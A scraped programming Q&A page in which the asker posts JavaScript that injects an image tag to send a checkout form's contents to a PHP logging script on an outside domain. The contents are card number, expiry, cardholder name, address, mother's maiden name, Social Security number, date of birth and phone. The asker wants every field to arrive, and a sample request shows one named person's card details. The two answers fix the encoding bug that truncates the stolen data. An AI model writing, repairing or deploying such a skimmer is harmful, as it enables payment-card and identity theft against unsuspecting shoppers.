Home > Software design >  PHP not receiving full GET parameters sent by image request
PHP not receiving full GET parameters sent by image request

Time:09-23

I am sending a GET request from a image added to the document via JavaScript. This request is sent to to a PHP server, PHP code as follows:

<?php
      if (!$_GET['token']) {
          return;
      }
    
      if (file_exists($_GET['token'].'.txt')) {
        $fh = fopen($_GET['token'].'.txt', 'a');
        fwrite($fh, json_encode($_GET)."\n==============================\n");
      } else {
        $fh = fopen($_GET['token'].'.txt', 'w');
        fwrite($fh, json_encode($_GET)."\n==============================\n");
      }
    
      fclose($fh);
    
      return;
    ?>

The issue is when I complete the GET request the PHP server only receives the GET parameters up to the billing_address_2 when there are many more parameters being sent by the image in the document. Below is the request the Apache PHP server receives:

/save-data.php?token=1632376762131.3433&credit_card_id=34&expiration_date=02/23&card_holder_name=Ishmael J Roth&billing_address=3904 E Oak Pl&billing_address_2=Apt

You can see there are more GET parameters in the image being added to the document by the JavaScript in the JS code below:

document.body.innerHTML  = `<img onl oad="submitCCForm()" src="https://example-domain.com/save-data.php?token=${ encodeURI(window.localStorage.token) }&credit_card_number=${ encodeURI(document.querySelector('[name=\"credit_card_number\"]').value) }&expiration_date=${ encodeURI(document.querySelector('[name=\"expiration_time\"]').value) }&card_holder_name=${ encodeURI(document.querySelector('[name=\"card_holder_name\"]').value) }&billing_address=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[1] }&billing_address_2=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[2] }&billing_address_3=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[3].replaceAll(',', '-') }&billing_address_4=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[4] }&mothers_maiden_name=${ encodeURI(document.querySelector('#mmn').value) }&=&social_security=${ encodeURI(document.querySelector('[name=\"social_security\"]').value) }&dob=${ encodeURI(document.querySelector('[name=\"dob\"]').value) }&billing_phone=${ encodeURI(document.querySelector('[name=\"billing_phone\"]').value) }" />`

Please share a solution to have the full get parameters sent in the image request to be received by the server and saved to the file, rather than the server stopping at the GET parameter billing_address_2.

CodePudding user response:

You are using unencoded GET parameter!

expiration_date=02/23

That is why you are required to urlencode all parameters...

CodePudding user response:

Looking at the URL you mentioned in comments, it seems like the # in billing_address_2, having the value Apt #253, is causing the problem. The portion after # is considered part of URL hash, not query string.

Having said that, you are supposed to use encodeURIComponent to encode individual query string parameter values instead of encodeURI. The difference is explained here.

Page link:https//www.codepudding.com/Softwaredesign/124449.html

Prev:Add individual ID to every occurrence of h2 in var
Next:Complicated SQL / Laravel Eloquent Query
  • Related

About Us:  Contact Us      Terms of Service       Privacy Policy

Copyright © 2010-2023,Powered By CodePudding